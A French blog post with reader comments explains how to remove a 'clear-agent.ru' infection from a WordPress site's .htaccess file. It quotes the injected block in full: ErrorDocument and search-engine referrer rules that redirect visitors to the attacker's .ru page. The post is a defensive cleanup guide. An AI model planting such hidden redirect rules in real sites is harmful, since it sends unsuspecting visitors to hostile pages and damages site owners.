Clear-agent.ru vous menace

le virus clear-agent.ru vous menace-t-il?
Je viens de découvrir un invité indésirable dans l’un de mes sites wordpress. Voici comment je m’en suis débarassé.

La gentille bestiole s’installe tranquillement dans votre fichier .htaccess, dans lequel elle rajoute à votre insu quelques lignes.

L’effet principal consiste à provoquer une redirection vers des sites choisis par le pollueur (en général en .ru, allez savoir pourquoi) sur des requêtes vers des pages inconnues de votre site, voire en fonction des sites référents (un moteur de recherche par exemple). Outre l’effet désastreux sur votre image de marque, je m’interroge également sur l’infection possible de l’ordinateur de votre (ex-futur) visiteur via son navigateur.

Comment vous débarrasser de cet hôte malveillant?

  • Accédez à votre interface d’hébergement
  • Rendez-vous dans la rubrique « gestion de fichiers »
  • ouvrez votre fichier .HTACCESS (à la racine de votre site, typiquement dans le répertoire « www » ou « public_html »).
  • Repérez les lignes suivantes :
RewriteEngine On
ErrorDocument 400 http://clear-agent.ru/setup/index.php
ErrorDocument 401 http://clear-agent.ru/setup/index.php
ErrorDocument 403 http://clear-agent.ru/setup/index.php
ErrorDocument 404 http://clear-agent.ru/setup/index.php
ErrorDocument 500 http://clear-agent.ru/setup/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://clear-agent.ru/setup/index.php [R=301,L]

(quelques lignes sont volontairement tronquées, je ne voudrais pas susciter de nouvelles vocations)

  • Sélectionnez les entièrement
  • Effacez les
  • Enregistrez votre fichier…

Il se peut que les permissions de votre fichier .htaccess ne vous permettent pas de le modifier et surtout le sauvegarder. Dans ce cas, à partir de l’interface de gestion de votre hébergement, modifier les permissions au profit de 644.

Comment avez vous « attrappé » ce virus?

Après quelques recherches, il semblerait que celui-ci s’installe en utilisant la fonctionnalité « mot de passe perdu » des CMS Joomla ou WordPress, en particulier mais de tout autre moteur de site possiblement.

Mes connaissances en programmation serveur ne me permettent pas de vous en dire plus mais je pense que vous saurez maintenant vous débarrasser de cette attaque malveillante.

Soyez généreux : partagez !

A lire également:

  1. Installer une extension pour wordpress
  2. Un thème WordPress pour les marketeurs

Author:

There is no additional info about this author.

3 thoughts on “Clear-agent.ru vous menace

  1. Alexandra on 23 octobre 2011

    Bonjour Jean-Michel,

    je découvre ton blog seulement maintenant et naturellement, je vais me le bookmarker comme il faut ! :-)

    Merci pour cette info, voilà une menace dont je n’avais encore jamais entendu parler, ça va faire un élément supplémentaire à vérifier parmi pas mal d’autres procédures de protection mais bon… faut s’y faire, la sécurité a un coût… en temps ! Et ce n’est pas un luxe.

    A bientôt, amicalement,
    Alexandra

    Reply
  2. jeanmich on 23 octobre 2011

    Bonjour Alexandra,

    « je découvre ton blog seulement maintenant » oui, c’est un peu volontaire car je démarre tout juste jmsilcom.com sous cette forme j’évite donc d’en faire la pub.

    Très heureux de te compter parmi mes lectrices :)

    Amicalement,
    Jean Michel

    Reply
  3. Thierry [Club Stratégie] on 10 novembre 2011

    Moi aussi je viens de le découvrir.
    Le retour de jmsilcom ;-)

    Bien à toi

    thierry

    Reply

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Infolettre

Pour être alerté des nouvelles publication ou simplement des nouveaux services proposés, je vous invite à me communiquer votre adresse email ci dessous :
Extension Factory Builder